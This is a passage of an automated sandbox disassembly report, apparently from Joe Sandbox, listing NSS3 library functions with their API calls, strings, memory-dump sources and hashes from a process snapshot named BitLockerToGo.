                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: PR_Unlock.NSS3(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C6312A0
                                                                                                                                                                                                                                                                                                                                                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C77FC0A,6C6D6BF7), ref: 6C6D6ECD
                                                                                                                                                                                                                                                                                                                                                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C6D6EE0
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C6D6EFC
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D6F04
                                                                                                                                                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6D6F18
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C6D6BF7), ref: 6C6D6F30
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C6D6BF7), ref: 6C6D6F54
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C6D6BF7), ref: 6C6D6FE0
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C6D6BF7), ref: 6C6D6FFD
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • SSLFORCELOCKS, xrefs: 6C6D6F2B
                                                                                                                                                                                                                                                                                                                                                          • SSLKEYLOGFILE, xrefs: 6C6D6EB1
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C6D6FDB
                                                                                                                                                                                                                                                                                                                                                          • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C6D6EF7
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C6D6FF8
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C6D6F4F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dfa51dcc9ce838c24f376449475b8f22cf13e08d7512abd79803d09f7a9293a3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 71b94ec6333c45e826c5cd2d81642d89f03be67e93e761b00348e05a89065053
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa51dcc9ce838c24f376449475b8f22cf13e08d7512abd79803d09f7a9293a3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66A12AB3A59D9086E710477CDC0238836A2A78732AF5A4779E932C7ED8DB75F440874B
                                                                                                                                                                                                                                                                                                                                                          Function 6C6AE8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001C,?,6C6AE853,?,FFFFFFFF,?,?,6C6AB0CC,?,6C6AB4A0,?,00000000), ref: 6C6AE8D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: calloc.MOZGLUE ref: 6C6A0D50
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: TlsGetValue.KERNEL32 ref: 6C6A0D6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6AE972
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6AE9C2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AEA00
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6AEA3F
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6AEA5A
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6AEA81
                                                                                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C6AEA9E
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6AEACF
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C6AEB56
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C6AEBC2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C6AEBEC
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6AEC58
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                                                                                                                                                                                                                                                                          • String ID: Sjl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759478663-3269269029
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9d330350c20e23a627a8a05952f3a1ba9b24d8d7af1310b111ea6e3961ff9db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b5e4b02c5daa8942254a01a426a526854e8687a366ccd11406cc33f1bafedfc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d330350c20e23a627a8a05952f3a1ba9b24d8d7af1310b111ea6e3961ff9db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3C195B1E012059FEB00CFA9D985BAA77F4BF09308F140469E91697751E731EC16CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D28C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D290A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D291E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D2937
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D294B
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2966
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D29AC
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D29D1
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D29F0
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2A15
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2A37
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A61
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A78
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A8F
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2AA6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C70945B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C709479
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: EnterCriticalSection.KERNEL32 ref: 6C709495
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C7094E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C709532
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: LeaveCriticalSection.KERNEL32 ref: 6C70955D
                                                                                                                                                                                                                                                                                                                                                          • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C6D2AF9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6D2B16
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6D2B6D
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6D2B80
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2841089016-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d619dc143dccad6ef4c5961aec576094fe04886c481d7e17cd518fd222b882d4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e8399eefea4d78818fffb3e9605989588a623f901383a614da48c7ef32bbd7d9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d619dc143dccad6ef4c5961aec576094fe04886c481d7e17cd518fd222b882d4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B68194B1A007015BEB209F35EC49797B7E5AF1530CF054928E85AC7B11EB32F919CB96
                                                                                                                                                                                                                                                                                                                                                          Function 6C759C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000080), ref: 6C759C70
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C759C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6321BC), ref: 6C62BB8C
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CA9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C709946
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5C16B7,00000000), ref: 6C70994E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: free.MOZGLUE(00000000), ref: 6C70995E
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CB9
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CC9
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C759CDA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C62BBEB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C62BBFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: GetLastError.KERNEL32 ref: 6C62BC03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C62BC19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: free.MOZGLUE(00000000), ref: 6C62BC22
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(?), ref: 6C759CF0
                                                                                                                                                                                                                                                                                                                                                          • PR_NewPollableEvent.NSS3 ref: 6C759D03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_CallOnce.NSS3(6C7A14B0,6C74F510), ref: 6C74F3E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_CreateIOLayerStub.NSS3(6C7A006C), ref: 6C74F402
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_Malloc.NSS3(00000004), ref: 6C74F416
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C74F42D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_SetSocketOption.NSS3(?), ref: 6C74F455
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C74F473
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709890: TlsGetValue.KERNEL32(?,?,?,6C7097EB), ref: 6C70989E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C759D78
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759DAF
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C759EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62B3C0: TlsGetValue.KERNEL32 ref: 6C62B403
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C62B459
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C75A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759DE8
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759DFC
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C75A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759E29
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759E3D
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C759E71
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C759E89
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29fa0b03d0d387b8cbc654fe0af54a573d14ed95342966368f3ab8765c043318
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54878f80bf2fa68f00126a230a55093d33ba55d6e0c517f5ffd484ff096b4588
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fa0b03d0d387b8cbc654fe0af54a573d14ed95342966368f3ab8765c043318
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B614FF1A00706AFD710DF75C948A67BBE8FF59208B044539E85AC7B51EB30E825CBA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C698E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698E7B
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698E9E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C7A0B64,00000001,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EAD
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EC3
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698ED8
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EE5
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C698E01), ref: 6C698EFB
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A0B64,6C7A0B64), ref: 6C698F11
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C698F3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C69A421,00000000,00000000,6C699826), ref: 6C69A136
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C69904A
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C698E76
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e4db0659b6109f399a8a2c5d3f73e75084473a11941c800956e1201907de4c8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 13eb6ff4318b3fd66fd22ff8231a98eaf6ab3c01f6cc5b15ad8245fc15bf23e8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4db0659b6109f399a8a2c5d3f73e75084473a11941c800956e1201907de4c8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC61D4B5D0010A9FDB10CF65CC44AAFB7B5FF88358F144428DC29A7710EB36A915CBA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C648E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C648E5B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C648E81
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C648EED
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7718D0,?), ref: 6C648F03
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C648F19
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C648F2B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C648F53
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C648F65
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C648FA1
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C648FFE
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C649012
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C649024
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C64902C
                                                                                                                                                                                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C64903E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
